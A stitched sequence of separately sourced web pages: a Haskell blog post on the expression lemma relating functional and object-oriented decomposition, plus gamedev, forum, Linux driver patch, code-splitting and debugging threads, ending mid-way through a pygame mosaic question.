The ingredients evalNum, evalAdd, modnNum and modnAdd are really like the equations in the style of general recursion, except that the recursive components of the left-hand side are already replaced by the recursively computed results; hence, the ingredients do not involve any recursive function applications of their own. (This is just a trivial and general consequence of committing to bananas.) The OO program is broken down into problem-specific ingredients quite similarly. Let’s compare. The functional program is structured as follows:

newBoth
  = uI both
  = uI (eval /\ modn)
  = uI (fE (evalNum \/ evalAdd) /\ fE (modnNum \/ modnAdd))

Here, we abbreviate unfoldIExpr as uI and foldExpr as fE. The OO program is structured as follows:

fromData
  = fE newEither
  = fE (newNum \/ newAdd)
  = fE (uI (numEval /\ numModn) \/ uI (addEval /\ addModn))

In both cases, recursion is under the regime of the composition scheme. You don’t have to be a rocket scientist in category theory to smell the duality here. Subject to several conditions on the problem-specific ingredients, we may be able, eventually, to prove that both compositions are observationally equivalent. Get a coffee first; this is going to be the hard part of the post. Playing stupid, one could hope that:

evalNum = numEval
evalAdd = addEval
modnNum = numModn
modnAdd = addModn

Quite obviously, this is not the case. (Not even the types fit.) A more complex correspondence has to be established. Let us do some factoring.
To this end, we observe again that the functional style of decomposition results in as many “disjunctions” as there are operations; each such disjunction is processed by a fold; these folds are then combined in a conjunction. Dually, the OO style of decomposition results in as many “conjunctions” as there are data variants; each such conjunction is processed by an unfold; these unfolds are then combined in a disjunction. Let us factor out the inner uses of fold and unfold so that the problem-specific ingredients are solely composed by “/\” and “\/”. For any functor F, the following “well-known” laws allow us to replace conjunctions of folds and disjunctions of unfolds by a single (co-)recursion:

The tupling law: fF a /\ fF b = fF ((a . F fst) /\ (b . F snd))

The co-tupling law: uF a \/ uF b = uF ((F Left . a) \/ (F Right . b))

(For the sake of a dense notation, we use a functor in an expression position to refer to the functorial map for that functor.) The tupling law happens to be the foundation of a powerful, optimizing transformation: if we wish to pair the results of two folds applied to the same argument (based on a split, cf. “/\”), we can combine their fold algebras into one, and thereby do the work of both folds in one pass of recursion. That is, rather than pairing the final results of two folds, we perform pairing (and projection) at each level of recursion, and thereby make do with one traversal. We do not care about optimization here, only about factoring. The co-tupling law is the dual of the first one. In OO terms, it tells us how to use a single interface implementation as a surrogate for two implementations of the same interface while taking the union of the state types. Regardless of any intuitions, the laws allow us to factor the functional vs. OO style of decomposition as follows:

Functional:

uI (fE fp)

fp = ((evalNum \/ evalAdd) . E fst) /\ ((modnNum \/ modnAdd) . E snd)

OO:

fE (uI oop)

oop = (I Left . (numEval /\ numModn)) \/ (I Right .
(addEval /\ addModn))

Let’s distribute projections and injections so that we get conjunctions of disjunctions, or vice versa. Thus:

fp = (evalNum \/ (evalAdd . (fst <*> fst))) /\ (modnNum \/ (modnAdd . (snd <*> snd)))

oop = (numEval /\ ((.) Left . numModn)) \/ (addEval /\ ((.) Right . addModn))

The roles of “\/” and “/\” are flipped in fp and oop. The “well-known” abide law can be used:

(f /\ g) \/ (h /\ i) = (f \/ h) /\ (g \/ i)

Let’s apply the abide law to oop:

oop = (numEval \/ addEval) /\ (((.) Left . numModn) \/ ((.) Right . addModn))

Now let’s match up the operands of “\/” in fp and oop. The differences – the occurrences of InExpr on the functional side and of outIExpr on the OO side – are the interesting part:

evalNum = id
vs. numEval = id

evalAdd . (fst <*> fst) = uncurry (+) . (fst <*> fst)
vs. addEval = uncurry (+) . ((fst . outIExpr) <*> (fst . outIExpr))

modnNum = (.) (InExpr . Left) . mod
vs. (.) Left . numModn = (.) Left . mod

modnAdd . (snd <*> snd) = (.) (InExpr . Right) . uncurry (/\) . (snd <*> snd)
vs. (.) Right . addModn = (.) Right . uncurry (/\) . ((snd . outIExpr) <*> (snd . outIExpr))

The differences can be understood as follows. The functional program has an extra step of committing results to the recursive closure of the data functor; cf. InExpr. The OO program has an extra step of retrieving arguments from the recursive closure of the interface functor; cf. outIExpr. These are really just “leftovers” from the particular decomposition styles. A “common denominator” of fp and oop (referred to as lambda from here on) can be obtained by factoring out (left or right) the extra steps:

oop :: IExprCoAlg (ExprF IExpr)
oop = lambda . fmapExprF outIExpr

fp :: ExprAlg (IExprF Expr)
fp = fmapIExprF InExpr . lambda

lambda = (a \/ b) /\ (c \/ d)
  where
    a = id
    b = uncurry (+) . (fst <*> fst)
    c = (.) Left . mod
    d = (.) Right . uncurry (/\) . (snd <*> snd)

Here is the executive summary of the steps:

oop = lambda1 . fmapExprF outIExpr
fp = fmapIExprF InExpr . lambda2

Step (5.) may fail for one of two reasons:

What would be the type of lambda?
As a Haskell programmer, you get used to all kinds of advanced cheating – one of them is type inference. However, let’s fight like real men, and figure out the type ourselves, because this might actually help with understanding the magic at hand. We start from the types of oop and fp:

oop :: IExprCoAlg (ExprF IExpr)
fp :: ExprAlg (IExprF Expr)

Let’s expand the type synonyms for (co-)algebras:

oop :: ExprF IExpr -> IExprF (ExprF IExpr)
fp :: ExprF (IExprF Expr) -> IExprF Expr

Let’s do step (4.) at the type level:

lambda1 :: ExprF (IExprF IExpr) -> IExprF (ExprF IExpr)
lambda2 :: ExprF (IExprF Expr) -> IExprF (ExprF Expr)

This does not leave much space for a type of the common denominator:

lambda :: ExprF (IExprF x) -> IExprF (ExprF x)

The two disagreeing positions in the types of lambda1 and lambda2 (IExpr vs. Expr) were generalized to the same type variable x. The type of any actual lambda must be at least as polymorphic as shown. We note that lambda‘s type is strictly more polymorphic than the explicit type signatures that we calculated for lambda1 and lambda2. If the factored definitions lambda1 and lambda2 (obtained by steps (1.)-(4.)) fail to type-check against the more polymorphic type, then our method fails to find observational equivalence. In categorical terms, the required polymorphism is what makes lambda a natural transformation, which is essentially a mapping from one functor to another. In fact, lambda is a special kind of natural transformation, i.e., a distributive law. That is, the source and target functors are actually compositions of two functors, and the composition is carried out in flipped order when comparing source and target; cf. ExprF . IExprF vs. IExprF . ExprF. It’s pretty easy to end up outside the required polymorphism. There is actually a systematic way of discussing such causes of unnaturality.
We simply look at the computed types of lambda1 and lambda2 and discuss all the differences one by one:

· The OO program is not allowed to invoke method chains on the subobjects. The result of invoking a subobject (by a single method call) cannot be further observed. (This follows from the fact that the general type IExpr in oop (which is isomorphic to IExprF IExpr in lambda1) is restricted to IExprF x in lambda.) This limitation may come across as odd, and a generalized expression lemma is appreciated; see our lovely paper.

· The OO program is not allowed to arbitrarily construct and replace subobjects. A method implementation is bound (by the type) to use the objects returned by the observations of the subobjects to fill in the slots for the subobjects in the result. This is arguably not a bad limitation, as it rules out OO programs that sort of arbitrarily rewrite the object graph. That is, the methods are forced to be compositional in a certain way.

· The functional program is not allowed to examine the precise expression structure of the intermediate results obtained by recursion. The less polymorphic type of lambda2 exposes the precise expression structure; the extra polymorphism of lambda hides the expression structure. Imposing such a ban on functional programmers resembles the notion of opaque data on the OO side, where one is not allowed to examine state (except when backdoors like reflection and serialization are leveraged).

· The functional program is not allowed to construct deep terms while combining intermediate results obtained by recursion. The type of lambda only admits one layer of functorial shape in the result; it does not even allow leaving out that single layer of functorial shape. This limitation may come across as odd, and a generalized expression lemma is appreciated; again, see our lovely paper.
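To make the required polymorphism concrete, here is lambda from the running example as a self-contained definition (my transcription; Control.Arrow’s (&&&) and (***) stand in for the post’s split “/\” and product map “<*>”, and either for “\/”). The fact that it type-checks against the fully polymorphic signature is exactly the naturality condition discussed above:

```haskell
import Control.Arrow ((&&&), (***))

type ExprF x  = Either Int (x, x)  -- data functor
type IExprF x = (Int, Int -> x)    -- interface functor

-- A distributive law: ExprF and IExprF are composed in
-- flipped order on the two sides of the arrow.
lambda :: ExprF (IExprF x) -> IExprF (ExprF x)
lambda = either a b &&& either c d
  where
    a = id                                     -- evalNum / numEval
    b = uncurry (+) . (fst *** fst)            -- evalAdd / addEval
    c i = \n -> Left (i `mod` n)               -- modnNum / numModn
    d (l, r) = \n -> Right (snd l n, snd r n)  -- modnAdd / addModn
```

Instantiating x to IExpr and pre-composing fmapExprF outIExpr recovers oop; instantiating x to Expr and post-composing fmapIExprF InExpr recovers fp.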
If we are able to match up the ingredients of a functional program and an OO program using the above steps (1.)-(5.), then the expression lemma promises observational equivalence for the different styles of composing the ingredients. The following version of the lemma glosses over some technical details; please look at the paper if you need to know more, and want to scrutinize the lemma or its proof. Given are two functors, T and I; think of T as the data functor (like ExprF in the example) and of I as the interface functor (like IExprF in the example). We assume generic definitions of fold and unfold for any functor. For clarity, we continue to attach the functor in question to any use of fold and unfold. Let’s stop using problem-specific recursive data types, and use the following generic type constructor for taking the recursive closure of any functor:

newtype Mu f = In { out :: f (Mu f) }

Then, for any lambda :: T (I x) -> I (T x), the following identity holds:

unfoldI (foldT (I In . lambda)) = foldT (unfoldI (lambda . T out))

(Read as: “Functional and OO programming are not all that different!”) We can also use the developed machinery to refactor an OO program into a functional program (or vice versa). For instance, in the direction of OO to functional programming, we first factor the OO program according to the steps (1.)-(4.), if possible. Then we set lambda = lambda1 and lambda2 = lambda. Now, we attempt the steps (1.)-(4.) in inverse order so that the functional program is calculated. Likewise, the other direction can be accommodated. The refactoring fails if we hit a “case without counterpart”:
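The identity of the lemma can be tried out on the running example (my sketch, not part of the original post; DeriveFunctor supplies the functorial maps, and the record selectors evalI/modnI play the role of the observations):

```haskell
{-# LANGUAGE DeriveFunctor #-}

-- Recursive closure of an arbitrary functor
newtype Mu f = In { out :: f (Mu f) }

foldT :: Functor f => (f x -> x) -> Mu f -> x
foldT a = a . fmap (foldT a) . out

unfoldI :: Functor f => (x -> f x) -> x -> Mu f
unfoldI c = In . fmap (unfoldI c) . c

-- Data functor T and interface functor I of the running example
data T x = N Int | A x x deriving Functor
data I x = I { evalI :: Int, modnI :: Int -> x } deriving Functor

-- The distributive law
lambda :: T (I x) -> I (T x)
lambda (N i)   = I i (\n -> N (i `mod` n))
lambda (A l r) = I (evalI l + evalI r) (\n -> A (modnI l n) (modnI r n))

-- The two sides of the expression lemma
funSide, ooSide :: Mu T -> Mu I
funSide = unfoldI (foldT (fmap In . lambda))   -- functional decomposition
ooSide  = foldT (unfoldI (lambda . fmap out))  -- OO decomposition

-- Observations on the resulting objects
obsEval :: Mu I -> Int
obsEval = evalI . out
obsModn :: Mu I -> Int -> Mu I
obsModn = modnI . out

sample :: Mu T
sample = In (A (In (N 39)) (In (A (In (N 1)) (In (N 2)))))

agree :: Bool
agree = obsEval (funSide sample) == obsEval (ooSide sample)  -- both 42
     && obsEval (obsModn (funSide sample) 10)
        == obsEval (obsModn (ooSide sample) 10)              -- both 12
```

On the sample term, both sides yield objects that agree under eval and under a modn-then-eval chain, as the lemma promises.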
For instance, how do we deal with hard-core non-functional objects (when mutation and aliasing cannot be ignored)? Also, what are the exact mechanics of a refactoring transformation? Further, how does the state of the art in fold mining relate to the needs of our method? Yet further, what other ideas for refactoring OO to functional programs must be critically integrated to make a contribution to real-world scenarios such as multi-core parallelization? Finally, I realize that, despite this long text, the presentation is still somewhat dense for someone not trained in Squiggol power and Haskell magic; so I hope that Ondrej and I end up writing a comprehensive tutorial on the full subject some day. Have a great summer! Let me go back to the beach now that I have finished this quick post.

Ralf Lämmel

The Department of Computer Science, University Koblenz-Landau, Campus Koblenz, invites applications for 2 research positions, available initially for 2 years:

· 1 PostDoc
· 1 PhD student

The corresponding funding is part of the state of Rhineland-Palatinate's Research Initiative 2008-2011. Please consult the ADAPT home page for further details. 9 research groups from the CS department in Koblenz (from several of its institutes) are associated with the theme. Also, the theme leverages collaboration with international partners at the CWI, Amsterdam, and Chalmers University of Technology, Göteborg. The successful applicants will do research in the interdisciplinary context of ADAPT, and be actively involved in further building up and refining the research theme. Thus, the positions provide extra opportunities for qualified applicants to distinguish themselves, in addition to the research aspects and the possibility to work on a dissertation and habilitation thesis. The deadline for applications is 1 September 2008. Email applications are preferred. See the contact section on the ADAPT home page.
Participants:

· Bernhard Beckert (Formal Methods and AI, Spokesperson)
· Jürgen Ebert (Software Engineering)
· Ulrich Furbach (Artificial Intelligence, Spokesperson)
· Rüdiger Grimm (IT Risk Management)
· Ralf Lämmel (Software Languages, Spokesperson)
· Dietrich Paulus (Active Vision)
· Steffen Staab (IS and Semantic Web)
· Klaus Troitzsch (Empirical Methods, Modeling and Simulation)
· Dieter Zöbel (Real-Time Systems and Mobile Systems Eng.)

1st International Conference on Software Language Engineering (SLE)

There are slightly extended deadlines: **Revised submission dates: Abstract submission: July 16th; Paper submission: July 21st**

I also look forward to the following keynote speakers:

Obviously, I also look forward to being in Toulouse. The next 2 weeks I am going to enjoy the Baltic Sea though.

Wannabe Software Language Engineer

CALL FOR PAPERS: IEEE Transactions on Software Engineering, Special Issue on Software Language Engineering. Guest editors:
http://blogs.msdn.com/ralflammel/
While it's on my mind, I wanted to write here few lessons I learned in last few days. - If the language supports polymorphism, USE IT. - Design before coding. - Having properly structured code helps. A LOT. - Keep the objects closely related on one heap. I've started to hunt coop related bugs in the game. Code, on the first look, seems to work perfectly; however, most code is structured like: if (multiPlayer == 0) { // do single player behavior } else { // do co op behavior }or a variation of that code, depending on player which "activates" part of the code. So, here's lesson 1: Why making numerous comparisons like that through the whole class - some of which are surprisingly volatile - when I can make new class which inherits the current one and override specific methods to adapt them for co-op mode of the game. With that, I'm also avoiding the problem of pointless allocation of resources (time and memory) for object related to co-op mode. Sound simple, right? Well, lessons 2 and 3 strike here at the same time. Due to "designing on the fly", I have to rewrite and refactor big parts of the code to adapt them for polymorphism. This means a lot of wasted time, due to the though process: "Hmm, I'd like to add <feature 1>. Well, I can add this code here, and that code there... *writing code* Oh cool, this works! Yaay!" "Now, to add <feature 2>... *writing* Crap, <feature 1> code isn't good here anymore... *moving and/or rewriting code* Good, now works." "OK, <feature 3> is next... oh not again, <feature 1> is broken. *rewriting and/or moving code*" "ARRRRRGH, NOT AGAIN!" (I'm now at this point) Result: lots of wasted time trying to improve the structure of the game while trying to preserve current functionality (a.k.a. trying to NOT break it). However, while I'm rewriting the code, I have to be careful. Some parts of the code, with best example being Draw(GameTime) method where last drawn object is on top, require executing in specific order. 
So, I can't simply do this:

```csharp
public class A : GameScreen
{
    // ...
    public override void Draw(GameTime gameTime)
    {
        // ...
    }
}

public class B : A
{
    // ...
    public override void Draw(GameTime gameTime)
    {
        // ...
        spriteBatch.Draw(player2texture, player2rectangle, Color.White);
        base.Draw(gameTime);
    }
}
```

because Player 2's sprite would end up on the bottom of everything, which may not be desirable. The solution I came up with is to extract the relevant parts of A.Draw() and raise them to protected level:

```csharp
public class A : GameScreen
{
    // ...
    public override void Draw(GameTime gameTime)
    {
        PartA();
        PartB();
    }

    protected void PartA()
    {
        // ...
    }

    protected void PartB()
    {
        // ...
    }
}

public class B : A
{
    // ...
    public override void Draw(GameTime gameTime)
    {
        PartA();
        spriteBatch.Draw(player2texture, player2rectangle, Color.White);
        PartB();
    }
}
```

This is also why properly structured code is necessary. Instead of having a massive amount of code inside one method, splitting the same code over several methods improves maintainability and readability.

Lesson 4 is connected to 2 and 3 as well. Inside my Gameplay class (the one holding the actual game logic) I had a few... awkward objects:

```csharp
Texture2D player1Texture;
byte player1spawnID;
Texture2D player2Texture;
byte player2spawnID;
```

Why is that?

```csharp
Player player1;
Player player2;

public override void LoadContent()
{
    player1 = ScreenManager.Player1;
    player2 = ScreenManager.Player2;
}
```

In other words, I have objects related to players, which persist through the whole game, being created, disposed and recreated inside the class holding the game logic. Memory problems aside, not storing player sprites inside the player classes also forces me to needlessly duplicate code and use additional checks to decide whose texture I need to move. Luckily, I don't need to do much to restructure the code and eliminate that annoyance. Suddenly, improving the level file doesn't seem so important.
So, what did I learn from all that for the next project (which is already defined in my head)? I wasted too much time restructuring the current project to enable modifications and upgrades. To avoid this in the next project, I need to write a Game Design Document and a Tech Document to precisely define the project and save time. I hope I won't repeat these mistakes in the next project (a Snake clone with a 3D camera). After reading some topics on GameDev.Net, especially this one, I realized I have to learn the following:
- Garbage collector
- Making unit tests
Actually, quickly some.
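Lesson 1 above (prefer subclassing over a multiplayer flag) can be sketched generically. This is an illustrative sketch with invented class and method names, written in Python purely for brevity; the game itself is C#/XNA, where the same idea applies:

```python
class SinglePlayerGame:
    """Base game: knows nothing about co-op."""

    def spawn_players(self):
        return ["player1"]

    def update(self):
        # Shared logic lives here once, with no `if multiPlayer` checks.
        return [p + ":updated" for p in self.spawn_players()]


class CoopGame(SinglePlayerGame):
    """Co-op mode: overrides only what differs."""

    def spawn_players(self):
        # Player 2's resources are allocated only in this subclass,
        # never in single-player mode.
        return super().spawn_players() + ["player2"]


print(SinglePlayerGame().update())  # ['player1:updated']
print(CoopGame().update())          # ['player1:updated', 'player2:updated']
```

The branching moves from every method body into a single choice of which class to instantiate when the game starts.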
http://www.gamedev.net/blog/1561/entry-2256881-fighting-the-code-backfire/#comment_2256153
import "go.chromium.org/luci/cipd/appengine/impl/settings"

Package settings contains the definition of global CIPD backend settings. These are settings that are usually set only once, after the initial service deployment. They are exposed through the Admin portal interface.

```go
// Settings contain CIPD backend settings.
type Settings struct {
	StorageGSPath string `json:"storage_gs_path"`
	TempGSPath    string `json:"temp_gs_path"`

	// SignAs is a name of a service account whose private key to use for
	// generating signed Google Storage URLs (through signBlob IAM API) instead of
	// the default service account.
	//
	// This is mostly useful on dev_server running under developer's account. It
	// doesn't have private keys for signing, but can still call signBlob API.
	SignAs string `json:"sign_as"`
}
```

Get returns the settings from the local cache, checking that they are populated. Returns a grpc-annotated Internal error if something is wrong.

ObjectPath constructs a path to the object in Google Storage, starting from the StorageGSPath root.

Package settings imports 8 packages and is imported by 1 package. Updated 2019-08-17.
https://godoc.org/go.chromium.org/luci/cipd/appengine/impl/settings
CGTalk > Software Specific Forums > Maxon Cinema 4D > C4D <-> MotionBuilder Workflow?

seco7 12-24-2005, 01:05 AM
I have been drawn to the MotionBuilder PLE (now that's good marketing), but I'm wondering if anyone with experience can give me an idea of the workflow between Cinema and MB? I could only find a little about some changes that have been made in the workflow with both C4D 9.5 and MB 7. I have no experience with CA... just a little animating objects. I know this is painfully newbie'ish, but what role does each app play? Does the wireframe go from Cinema to MB, then back to Cinema in FBX for staging and rendering? How are textures affected? How much of the timeline etc. can be changed in Cinema; in other words, can it be integrated with XPresso, for example? Thanks in advance, Steve

Duffdaddy 12-24-2005, 09:38 AM
Head over to and have a look at the DVD by Olly Wuensch - it combines C4D, ZBrush and MotionBuilder.

robotbob 12-24-2005, 10:24 AM
For an MB quickstart head over to 3D Buzz - he has tutorials based on MB 4, but they are what I used to start. I also have Olly's DVD, which is great as well and invaluable for specific C4D --> MB tips. But basically my workflow is as follows:
- model (C4D)
- weight + set bones (C4D)
- export via FBX
- set control rig in MB
- animate in MB + plot properties
- export via FBX
- import FBX back into C4D
- create a motion track for your topmost bone in C4D and apply your imported MB FBX (topmost bone) to that motion track (this includes using separate motion tracks for props, like a bike for instance, + make your FBX from MB invisible)
- render (C4D)
Textures are not affected because you are rendering the original mesh you exported to MB. XPresso also works fine, but, for example, if you use a position node to parent a hat to your character's head, you use the head bone from your MB FBX reference, as that is what is driving the native C4D mesh you are rendering. Probably sounds a bit confusing until you get a video tutorial. Good luck, pedro

nutriman 12-24-2005, 11:38 AM
Refers to older versions but I think it helps:

seco7 12-24-2005, 06:23 PM
Great, thank you all very much... the resources look most excellent! Happy Holidays.

CGTalk Moderation 12-24-2005, 06.
http://forums.cgsociety.org/archive/index.php/t-304509.html
Martin Michlmayr <tbm@cyrius.com> wrote:
>
> * Jim Gifford <maillist@jg555.com> [2006-01-16 08:27]:
> > >>>The attached patch allows the tulip driver to work with the RaQ2's
> > >>>network adapter. Without the patch under a 64-bit build, it will
> > >>>never negotiate and will drop packets. This driver is part of
> > >>>Linux PA-RISC, by Grant Grundler. It's currently in -mm, but Jeff
> > >>>Garzik will not apply it to the main tree.
> > >>>
> > >>Why?
> >
> > Jeff Garzik refuses to apply it due to spinlocks. Andrew Morton is
> > including it in his tree because it fixes issues with PA-RISC and with
> > MIPS-based builds. He researched the manufacturer's documentation and
> > found out how to fix the driver to work at its optimum performance.
> > He did this back in 2003, and has submitted it to Jeff Garzik several
> > times with no response. Jeff sends back a one-liner saying that due
> > to its use of spinlocks it's not accepted.
>
> Andrew, do you think that issue will be resolved in some way at some
> point?
>

This has been hanging around for too long. We need to get it over the hump.

Jeff, can you please suggest how this patch should be altered to make it acceptable?

Thanks.

From: Jim Gifford <maillist@jg555.com>, Grant Grundler <grundler@parisc-linux.org>, Peter Horton <pdh@colonel-panic.org>

With Grant's help I was able to get the tulip driver to work with 64-bit MIPS.
Signed-off-by: Andrew Morton <akpm@osdl.org>
---

 drivers/net/tulip/media.c      |   22 ++++++++++++++++++++--
 drivers/net/tulip/tulip.h      |    7 +++++--
 drivers/net/tulip/tulip_core.c |    2 +-
 net/tulip/eeprom.c             |    0
 net/tulip/interrupt.c          |    0
 5 files changed, 26 insertions(+), 5 deletions(-)

diff -puN drivers/net/tulip/eeprom.c~tulip-fix-for-64-bit-mips drivers/net/tulip/eeprom.c
diff -puN drivers/net/tulip/interrupt.c~tulip-fix-for-64-bit-mips drivers/net/tulip/interrupt.c
diff -puN drivers/net/tulip/media.c~tulip-fix-for-64-bit-mips drivers/net/tulip/media.c
--- devel/drivers/net/tulip/media.c~tulip-fix-for-64-bit-mips	2006-01-05 22:45:01.000000000 -0800
+++ devel-akpm/drivers/net/tulip/media.c	2006-01-05 22:45:17.000000000 -0800
@@ -44,8 +44,10 @@ static const unsigned char comet_miireg2
 /* MII transceiver control section.
    Read and write the MII registers using software-generated serial
-   MDIO protocol. See the MII specifications or DP83840A data sheet
-   for details. */
+   MDIO protocol.
+   See IEEE 802.3-2002.pdf (Section 2, Chapter "22.2.4 Management functions")
+   or DP83840A data sheet for more details.
+ */

 int tulip_mdio_read(struct net_device *dev, int phy_id, int location)
 {
@@ -272,13 +274,29 @@ void tulip_select_media(struct net_devic
 			int reset_length = p[2 + init_length];
 			misc_info = (u16*)(reset_sequence + reset_length);
 			if (startup) {
+				int timeout = 10;	/* max 1 ms */
 				iowrite32(mtable->csr12dir | 0x100, ioaddr + CSR12);
 				for (i = 0; i < reset_length; i++)
 					iowrite32(reset_sequence[i], ioaddr + CSR12);
+
+				/* flush posted writes */
+				ioread32(ioaddr + CSR12);
+
+				/* Sect 3.10.3 in DP83840A.pdf (p39) */
+				udelay(500);
+
+				/* Section 4.2 in DP83840A.pdf (p43) */
+				/* and IEEE 802.3 "22.2.4.1.1 Reset" */
+				while (timeout-- &&
+					(tulip_mdio_read (dev, phy_num, MII_BMCR) & BMCR_RESET))
+					udelay(100);
 			}
 			for (i = 0; i < init_length; i++)
 				iowrite32(init_sequence[i], ioaddr + CSR12);
+
+			ioread32(ioaddr + CSR12);	/* flush posted writes */
 		}
+
 		tmp_info = get_u16(&misc_info[1]);
 		if (tmp_info)
 			tp->advertising[phy_num] = tmp_info | 1;
diff -puN drivers/net/tulip/tulip_core.c~tulip-fix-for-64-bit-mips drivers/net/tulip/tulip_core.c
--- devel/drivers/net/tulip/tulip_core.c~tulip-fix-for-64-bit-mips	2006-01-05 22:45:01.000000000 -0800
+++ devel-akpm/drivers/net/tulip/tulip_core.c	2006-01-05 22:45:01.000000000 -0800
@@ -22,7 +22,7 @@
 #else
 #define DRV_VERSION	"1.1.13"
 #endif
-#define DRV_RELDATE	"May 11, 2002"
+#define DRV_RELDATE	"December 15, 2004"

 #include <linux/module.h>
diff -puN drivers/net/tulip/tulip.h~tulip-fix-for-64-bit-mips drivers/net/tulip/tulip.h
--- devel/drivers/net/tulip/tulip.h~tulip-fix-for-64-bit-mips	2006-01-05 22:45:01.000000000 -0800
+++ devel-akpm/drivers/net/tulip/tulip.h	2006-01-05 22:45:01.000000000 -0800
@@ -474,8 +474,11 @@ static inline void tulip_stop_rxtx(struc
 			udelay(10);

 		if (!i)
-			printk(KERN_DEBUG "%s: tulip_stop_rxtx() failed\n",
-					pci_name(tp->pdev));
+			printk(KERN_DEBUG "%s: tulip_stop_rxtx() failed"
+					" (CSR5 0x%x CSR6 0x%x)\n",
+					pci_name(tp->pdev),
+					ioread32(ioaddr + CSR5),
+					ioread32(ioaddr + CSR6));
 	}
 }
_
http://www.linux-mips.org/archives/linux-mips/2006-01/msg00147.html
Reduce JavaScript payloads with code splitting

Nobody likes waiting. Over 50% of users abandon a website if it takes longer than 3 seconds to load. Sending large JavaScript payloads impacts the speed of your site significantly. Instead of shipping all the JavaScript to your user as soon as the first page of your application is loaded, split your bundle into multiple pieces and only send what's necessary at the very beginning.

Measure

Lighthouse displays a failed audit when a significant amount of time is taken to execute all the JavaScript on a page.

Split the JavaScript bundle to only send the code needed for the initial route when the user loads an application. This minimizes the amount of script that needs to be parsed and compiled, which results in faster page load times.

Popular module bundlers like webpack, Parcel, and Rollup allow you to split your bundles using dynamic imports. For example, consider the following code snippet, which shows an example of a someFunction method that gets fired when a form is submitted.

```js
import moduleA from "library";

form.addEventListener("submit", e => {
  e.preventDefault();
  someFunction();
});

const someFunction = () => {
  // uses moduleA
};
```

Here, someFunction uses a module imported from a particular library. If this module is not being used elsewhere, the code block can be modified to use a dynamic import to fetch it only when the form is submitted by the user.

```js
form.addEventListener("submit", e => {
  e.preventDefault();
  import('library.moduleA')
    .then(module => module.default) // using the default export
    .then(someFunction())
    .catch(handleError());
});

const someFunction = () => {
  // uses moduleA
};
```

The code that makes up the module does not get included in the initial bundle and is now lazy loaded, or provided to the user only when it is needed, after the form submission. To further improve page performance, preload critical chunks to prioritize and fetch them sooner.
Although the previous code snippet is a simple example, lazy loading third party dependencies is not a common pattern in larger applications. Usually, third party dependencies are split into a separate vendor bundle that can be cached since they don't update as often. You can read more about how the SplitChunksPlugin can help you do this. Splitting on the route or component level when using a client-side framework is a simpler approach to lazy loading different parts of your application. Many popular frameworks that use webpack provide abstractions to make lazy loading easier than diving into the configurations yourself.
https://web.dev/reduce-javascript-payloads-with-code-splitting/
Starting with IntelliJ IDEA 11 I cannot debug Flex 3.x projects anymore. The debugger connects to Flash Player debug (11.1.102.55), then it takes 10 seconds to start the project, but all breakpoints (like the trace() on line 11 below) are marked invalid/are skipped. So I tried Astella 112.507 - same thing. The IDEA 10 debugger works fine with Flex 3.x. I am running OS X 10.7.2.

```xml
<?xml version="1.0"?>
<mx:Application xmlns:
    <mx:Script><![CDATA[
        import mx.controls.Alert;

        private function onCreationComplete():void {
            trace("onCreationComplete()"); // <== breakpoint marked invalid/skipped
        }
    ]]></mx:Script>
    <mx:Button
</mx:Application>
```

Any idea what's wrong? BTW - how do I mark code blocks in the forum text editor? Thanks and Regards, Peter

Hm, all works fine for me in both IDEA and Astella. App starting takes less than a second and breakpoints work. Can you please attach a sample project (though I hardly believe it differs from mine)?

I just created a new project in Astella and added the onCreationComplete() method to add a breakpoint - so it is really the minimum. Strange, it does not work on my colleague's computer either. We are both running OS X 10.7.2 with the latest Java SDK (build 1.6.0_29-b11-402-11M3527) and Flash Player debug 11.1.102.55. Are you on Windows or Linux by any chance? Peter

Windows 7, JDK 1.6.0_27 32-bit, FP 11.1.102.55 standalone debugger. Will try on Mac. BTW, what exact version of Flex SDK 3.x did you try?

Hi Alexander, thanks for responding so quickly. I am working with the browser Flash Player plugin (because I need to fiddle with flashvars). I tried Flex SDK 3.6.0.16995, 3.5.0.12683 and 3.3.4852. Peter

Thank you, my colleague has reproduced the problem and it seems to be an FP 11 for Mac bug. IDEA 10.5 works with this player version in the same way. I suppose you used a different FP when you were working with IDEA 10.5, didn't you?

You are right, we had tested IDEA 10.5 with FP 10.3, sorry about the confusion. Once we update to FP 11.1, IDEA 10.5 has the same problem. Is there a chance that you can implement a workaround for the FP bug in IDEA/Astella? Otherwise it would be a pain to fix bugs in legacy Flex 3 projects :-( Thanks for responding so quickly, Peter

We can debug Adobe's flex debugger itself, but the chances that the FP bug can be worked around on the debugger side are very small. Most probably FP just gives incorrect responses to the debugger, and this can't be worked around. And the slow startup on Mac - I have no idea what the problem is. Can you please open the respective 2 issues in Adobe's bug tracker? They are not as responsive as we are, but maybe they'd like to fix at least the startup performance issue.

More voodoo. Flash Builder 4.6 works normally - no startup delay, and the debugger works as expected. Damn, IDEA for coding, FB for debugging is not so thrilling. Peter

Need to sort out. Then please add a request in our tracker. Just to check whether it is a compiler or a debugger issue, can you please try to debug a swf compiled by FB using the IDEA/Astella debugger (use a remote flash run configuration)?

I debugged an FB 4.6 compiled SWF with IDEA 11.0.1 - same problem, so it seems to be a debugger issue. I created YouTrack issues for Astella and IDEA. Thanks, Peter

One issue is enough
https://devnet.jetbrains.com/thread/433710
This part of the program converts a 'target image' (the one that will be made up of small source images) to smaller blocks of color that other source images will try to match and then replace eventually. But for some reason, the size of the blocks keeps increasing with every iteration. I've tried so many different things that I've had to go through the script and delete out a bunch of things and add a couple more comments before posting. The target img is attached (a 1280x800 random google image), but any other picture should work just the same. Watch as the Y size of the blit increases with every block going down, and the X size increases as new rows are made. I hard coded in a set size for the solid color rectangle (2 pixels across, much smaller than I'll use), but for whatever reason this keeps increasing. The first row of blits is so small right now that it's hard to see. That quickly changes. **OK, image is not attaching. Here's the link to what I am using (), but any other pic/size renamed to target.jpg should do the same. If anyone can point me in the right direction it would be much appreciated. I want to cover this whole source pic in nice 12x12 blocks of solid color to start with. I can't figure out what is changing these block sizes as it goes.

```python
import pygame
import os
from time import sleep

okformats = ['png','jpg','bmp','pcx','tif','lbm','pbm','pgm','ppm','xpm']
targetimg = 'C:\\Python27\\mosaic\\target.jpg' #sorry linux users, I got lazy here

if targetimg[-3:] not in okformats:
    print 'That format is unsupported, get ready for some errors...'
else:
    print 'Loading...'

pygame.init()
screen = pygame.display.set_mode((100,100)) #picked a size just to start it out
clock = pygame.time.Clock() #possibly not needed in this script

targetpic = pygame.image.load(targetimg).convert()
targetrect = targetpic.get_rect() #returns something like [0,0,128,128]
targetsize = targetrect[2:]
targetw = targetrect[2]
targeth = targetrect[3]

numpicsx = 100 #number of pictures that make up the width
